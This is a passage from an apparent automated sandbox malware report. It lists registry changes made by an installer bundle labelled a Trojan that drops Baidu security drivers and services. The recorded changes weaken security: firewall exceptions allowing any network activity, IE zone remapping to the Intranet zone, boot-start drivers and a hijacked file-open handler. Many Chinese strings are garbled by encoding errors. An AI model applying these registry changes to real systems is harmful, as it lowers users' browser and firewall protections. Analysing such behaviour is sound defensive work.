[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}]
"(Default)" = "_IDownloaderEvents"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}]
"AppID" = "{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0]
"(Default)" = "DownloadProxy 1.0 Type Library"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\VersionIndependentProgID]
"(Default)" = "BDDownloadProxy.Downloader"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "IDownloader"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process bddownloader.exe:3300 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 C2 BA 26 D0 8C B5 7E E3 0E 4A 70 10 7C C3 3B"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\metnsd\clsid]
"SequenceID" = "59 02 BF 88 AE 5C DF 4E 8B F2 61 7C 4A 3A BB 8F"

The process bddownloader.exe:3792 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE 0F A4 74 3D 75 74 94 70 CF 34 78 ED 14 97 FE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process G1023_s_70904.exe:3576 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«]
"Publisher" = "ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã…â€œÃ‚Â¨ÃƒÂ§Ã‚ÂºÃ‚Â¿ÃƒÂ§Ã‚Â½Ã¢â‚¬ËœÃƒÂ§Ã‚Â»Ã…â€œÃƒÂ¦Ã…Â Ã¢â€šÂ¬ÃƒÂ¦Ã…â€œÃ‚Â¯ÃƒÂ¯Ã‚Â¼Ã‹â€ ÃƒÂ¥Ã…â€™Ã¢â‚¬â€ÃƒÂ¤Ã‚ÂºÃ‚Â¬ÃƒÂ¯Ã‚Â¼Ã¢â‚¬Â°ÃƒÂ¦Ã…â€œÃ¢â‚¬Â°ÃƒÂ©Ã¢â€žÂ¢Ã‚ÂÃƒÂ¥Ã¢â‚¬Â¦Ã‚Â¬ÃƒÂ¥Ã‚ÂÃ‚Â¸"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«]
"DisplayVersion" = "3.0.0.3971"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Description" = "ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢ÃƒÂ¥Ã…Â Ã…Â¸ÃƒÂ¨Ã†â€™Ã‚Â½ÃƒÂ§Ã‚Â»Ã¢â‚¬Å¾ÃƒÂ¤Ã‚Â»Ã‚Â¶"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Type" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«]
"DisplayIcon" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\app.ico"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"InstallDate" = "2014-11-6"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Tag" = "2"

[HKLM\System\CurrentControlSet\Services\bd0003\Instances\bd0003 Instance]
"Altitude" = "326912"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Tag" = "4"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\BDMSkin.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\GetSupplyId.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\KVInstallHelper.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\, , \??\%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll.bak,"

[HKLM\System\CurrentControlSet\Services\bd0002]
"InstallDir_hips" = "%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733"

[HKCR\Unknown\shell\openas\command]
"DelegateExecute" = ""

[HKLM\System\CurrentControlSet\Services\BDArKit]
"ErrorControl" = "0"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Group" = "FSFilter Anti-Virus"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Description" = "BDArKit"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts]
"Baiduan Number(TrueType)" = "baiduan_number_new.ttf"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"VirusTime" = "2013.04.05 1216"

[HKLM\SOFTWARE\Baidu\BaiduHips]
"Version" = "1.1.0.733"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Type" = "1"

[HKCR\Unknown\shell\openas\command]
"(Default)" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BDAFileHelper.exe -file=%1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\System\CurrentControlSet\Services\bd0003\Instances]
"DefaultInstance" = "bd0003 Instance"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"INSTLANG" = "2052"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"Version" = "3.0.0.3971"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B 9D AC BF FD 8A 85 33 78 FA 65 C6 21 1A 46 70"

[HKLM\System\CurrentControlSet\Services\bd0001]
"DisplayName" = "bd0001"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\bd0003]
"DependOnService" = "FltMgr"

[HKLM\System\CurrentControlSet\Services\BDKVRTP]
"Group" = "bdsvcorder"

[HKLM\System\CurrentControlSet\Services\BaiduHips]
"Tag" = "1"

[HKLM\SOFTWARE\Baidu\BaiduHips]
"InstallPath" = "%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHips.exe"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Group" = "bddriver"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«]
"UninstallString" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\uninst.exe"

[HKLM\System\CurrentControlSet\Services\BaiduHips]
"Group" = "bdsvcorder"

[HKLM\System\CurrentControlSet\Services\bd0003]
"ImagePath" = "system32\DRIVERS\bd0003.sys"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Tag" = "1"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"ImagePath" = "system32\DRIVERS\BDArKit.sys"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bdsvcorder" = "04 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"RtpFlag" = "273"

[HKLM\System\CurrentControlSet\Services\bd0002]
"DisplayName" = "bd0002"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Type" = "2"

[HKLM\System\CurrentControlSet\Services\bd0002]
"ErrorControl" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Group" = "bddriver"

[HKLM\System\CurrentControlSet\Services\bd0001]
"ImagePath" = "system32\DRIVERS\bd0001.sys"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Tag" = "3"

[HKLM\System\CurrentControlSet\Services\BDKVRTP]
"Tag" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\bd0001]
"ErrorControl" = "0"

[HKLM\SOFTWARE\Baidu\BaiduHips]
"InstallDir" = "%Program Files%\Common Files\Baidu\BaiduHips"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Description" = "bd0002"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Type" = "1"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"SupplyID" = "70904"
"InstallDir" = "%Program Files%\Baidu\BaiduAn"

[HKLM\System\CurrentControlSet\Services\bd0003]
"ErrorControl" = "1"

[HKLM\System\CurrentControlSet\Services\bd0002]
"ImagePath" = "system32\DRIVERS\bd0002.sys"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«]
"DisplayName" = "ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«3.0"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\System\CurrentControlSet\Services\bd0003\Instances\bd0003 Instance]
"Flags" = "0"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"DisplayName" = "BDArKit"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Group" = "bddriver"

"Description" = "bd0001"

[HKLM\System\CurrentControlSet\Services\bd0003]
"DisplayName" = "bd0003"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduAn\3.0.0.3971]
"BaiduAnBugRpt.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAnBugRpt.exe:*:Enabled:ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«BUGÃƒÂ¤Ã‚Â¸Ã…Â ÃƒÂ¦Ã…Â Ã‚Â¥ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

"BaiduAnTray.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAnTray.exe:*:Enabled:ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«ÃƒÂ¦Ã¢â‚¬Â°Ã‹Å“ÃƒÂ§Ã¢â‚¬ÂºÃ‹Å“ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\bd0003]
"Start" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduAn\3.0.0.3971]
"BaiduAn.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAn.exe:*:Enabled:ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«ÃƒÂ¤Ã‚Â¸Ã‚Â»ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduAn\3.0.0.3971]
"BaiduAnUpdate.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAnUpdate.exe:*:Enabled:ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«ÃƒÂ¦Ã¢â‚¬ÂºÃ‚Â´ÃƒÂ¦Ã¢â‚¬â€œÃ‚Â°ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduAn\3.0.0.3971]
"BaiduAnBugRpt.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAnBugRpt.exe:*:Enabled:ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«BUGÃƒÂ¤Ã‚Â¸Ã…Â ÃƒÂ¦Ã…Â Ã‚Â¥ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

The following service will be launched automatically at system boot up:

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Start" = "2"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\bd0002]
"Start" = "1"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduAn\3.0.0.3971]
"BaiduAnSvc.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAnSvc.exe:*:Enabled:ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«ÃƒÂ¦Ã…â€œÃ‚ÂÃƒÂ¥Ã…Â Ã‚Â¡ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\bd0001]
"Start" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduAn\3.0.0.3971]
"BaiduAnUpdate.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAnUpdate.exe:*:Enabled:ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«ÃƒÂ¦Ã¢â‚¬ÂºÃ‚Â´ÃƒÂ¦Ã¢â‚¬â€œÃ‚Â°ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

"BaiduAnSvc.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAnSvc.exe:*:Enabled:ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«ÃƒÂ¦Ã…â€œÃ‚ÂÃƒÂ¥Ã…Â Ã‚Â¡ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduAn\3.0.0.3971]
"BaiduAn.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAn.exe:*:Enabled:ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«ÃƒÂ¤Ã‚Â¸Ã‚Â»ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Baidu\BaiduAn]
"RtpFlag"

[HKLM\System\CurrentControlSet\Services\bd0003]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\bd0002]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\bd0001]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"DeleteFlag"

The process %original file name%.exe:716 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 78 53 70 87 26 E8 93 7C BE 9E 3F 48 76 5E 65"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"setup.exe" = "baidu Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process BaiduSdTray.exe:2844 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 FC 50 8F 1A CD 23 78 1B 66 11 7F A4 D9 01 9C"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID]
"{15DEE173-1BE9-4424-81E0-58A87076E9B1}" = "1"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Baidu\BaiduSd\2.1.0.3086]
"BaiduSdBugRpt.exe" = "ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚Â¼Ã¢â‚¬Å¡ÃƒÂ¥Ã‚Â¸Ã‚Â¸ÃƒÂ¦Ã…Â Ã‚Â¥ÃƒÂ¥Ã¢â‚¬ËœÃ…Â ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The process BaiduAnTray.exe:3824 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF 3D DB 36 23 4D B8 9A C9 65 30 30 E0 20 F2 01"

The process setup.exe:1056 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 EA 07 A3 20 F9 4F F9 B0 58 B4 92 4C 57 69 0E"

The process cacls.exe:1860 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 F2 12 B7 FD 64 89 B9 B7 AE BD E7 1E BF F9 32"

The process MsiExec.exe:548 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 46 D1 8C 7D 67 FF 53 C9 D9 2A 62 5C 76 19 05"

The process MsiExec.exe:1968 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 24 C3 48 CD 4B 0E F9 0D 18 C7 9A 77 37 68 D5"

The process BaiduAnBugRpt.exe:916 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 3C 86 26 7C 1C 08 2C 01 8E 8C D5 40 04 2E F6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
